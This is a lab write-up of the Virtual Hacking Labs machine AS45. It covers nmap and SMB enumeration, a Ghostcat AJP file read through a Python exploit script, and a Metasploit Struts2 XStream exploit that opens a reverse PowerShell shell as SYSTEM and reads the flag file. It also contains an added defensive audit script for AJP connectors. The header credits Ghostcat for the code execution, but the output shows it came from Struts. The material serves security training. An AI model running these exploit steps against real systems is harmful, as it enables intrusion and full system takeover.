Web / Medium / Windows

VHL — AS45

Apache Tomcat 8.0.47 on Windows with AJP exposed. Exploited Ghostcat (CVE-2020-1938) via AJP connector to read sensitive files and gain RCE.

February 13, 2025 / Virtual Hacking Labs
#Tomcat #Ghostcat #CVE-2020-1938 #AJP

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 16:16 EST
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.49% done; ETC: 16:17 (0:00:00 remaining)
Nmap scan report for 10.11.1.109
Host is up (0.020s latency).
Not shown: 62096 closed tcp ports (reset), 3428 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
8009/tcp  open  ajp13         Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp  open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/8.0.47
|_http-favicon: Apache Tomcat
| http-robots.txt: 4 disallowed entries 
|_/docs /examples /manager /struts2-rest-showcase
|_http-server-header: Apache-Coyote/1.1
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/13%OT=135%CT=1%CU=43550%PV=Y%DS=2%DC=I%G=Y%TM=67A
OS:E6184%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=105%TI=I%TS=7)SEQ(SP=10
OS:5%GCD=1%ISR=106%TI=I%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NN
OS:T11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=200
OS:0%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)
OS:T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-13T21:17:52
|_  start_date: 2025-02-13T20:16:13
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT      ADDRESS
1   19.98 ms 10.11.1.109

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.76 seconds
```

445

```sh
445/tcp   open  microsoft-ds?
```

```sh
smbclient -N -L \\\\10.11.1.109
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.11.1.109 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

8009

```sh
8009/tcp  open  ajp13         Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
```

```sh
python2 48143.py -p 8009 -f 'WEB-INF/web.xml' 10.11.1.109
Getting resource at ajp13://10.11.1.109:8009/asdf
----------------------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
  version="3.1"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>

</web-app>
```
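The precondition for the web.xml read above is an AJP connector reachable from the network without a shared secret, which is what the default Tomcat config ships with (AJP on 8009, bound to every interface). As an added defender-side check that is not part of this writeup, the script below audits a constructed server.xml and flags each AJP connector that is network-exposed or unauthenticated; `address`, `secretRequired` and `secret` are the real Connector attributes from the patched 8.5/9.0 lines, while Tomcat 8.0.x went end of life before the Ghostcat fix, so on 8.0.47 the only remediation is binding the connector to loopback or removing it.

```python
"""Audit a Tomcat server.xml for AJP connectors in the state the AS45 box was in.

Added example, not part of the original writeup. SAMPLE_SERVER_XML is a
constructed sample; the Connector attribute names are real Tomcat ones.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the 8009 connector mirrors the Tomcat 8.0 default
# (no address binding, no secret); the 8010 connector is the hardened form.
SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="PLACEHOLDER_CHANGE_ME" />
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP connector.

    exposed:          no address attribute (Tomcat binds all interfaces)
                      or an address that is not loopback
    unauthenticated:  secretRequired is not "true" or no secret is set
    ghostcat_exposed: both, i.e. an unauthenticated AJP client on the
                      network can send forward requests to this connector
    """
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        # protocol defaults to HTTP/1.1 when the attribute is absent
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        address = conn.get("address", "0.0.0.0")
        exposed = address not in LOOPBACK
        secret_required = conn.get("secretRequired", "false").lower() == "true"
        unauthenticated = not (secret_required and conn.get("secret"))
        findings.append({
            "port": int(conn.get("port", "8009")),
            "address": address,
            "exposed": exposed,
            "unauthenticated": unauthenticated,
            "ghostcat_exposed": exposed and unauthenticated,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print(finding)
```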

8080

```sh
8080/tcp  open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/8.0.47
|_http-favicon: Apache Tomcat
| http-robots.txt: 4 disallowed entries 
|_/docs /examples /manager /struts2-rest-showcase
|_http-server-header: Apache-Coyote/1.1
```

struts2-rest-showcase

http://10.11.1.109:8080/robots.txt

```text
User-agent: *
Disallow: /docs
Disallow: /examples
Disallow: /manager
Disallow: /struts2-rest-showcase
```

metasploit (struts2_rest_xstream)

```sh
msf6 exploit(multi/http/struts2_rest_xstream) > options

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting                       Required  Description
   ----       ---------------                       --------  -----------
   Proxies                                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.11.1.109                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                                              using-metasploit.html
   RPORT      8080                                  yes       The target port (TCP)
   SSL        false                                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3/edit  yes       Path to Struts action
   URIPATH                                          no        The URI to use for this exploit (default is random)
   VHOST                                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                       0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/windows/reverse_powershell):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.1       yes       The listen address (an interface may be specified)
   LPORT  80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows (In-Memory)
```

```sh
msf6 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 172.16.1.1:80 
[*] Command shell session 2 opened (172.16.1.1:80 -> 10.11.1.109:49314) at 2025-02-13 16:57:46 -0500


Shell Banner:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\Apache Software Foundation\Tomcat 8.0>
-----


C:\Program Files\Apache Software Foundation\Tomcat 8.0>whoami
whoami
nt authority\system

C:\Program Files\Apache Software Foundation\Tomcat 8.0>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
6f7rlecj04by2lvx28ao
C:\Program Files\Apache Software Foundation\Tomcat 8.0>date
date
The current date is: Thu 02/13/2025
```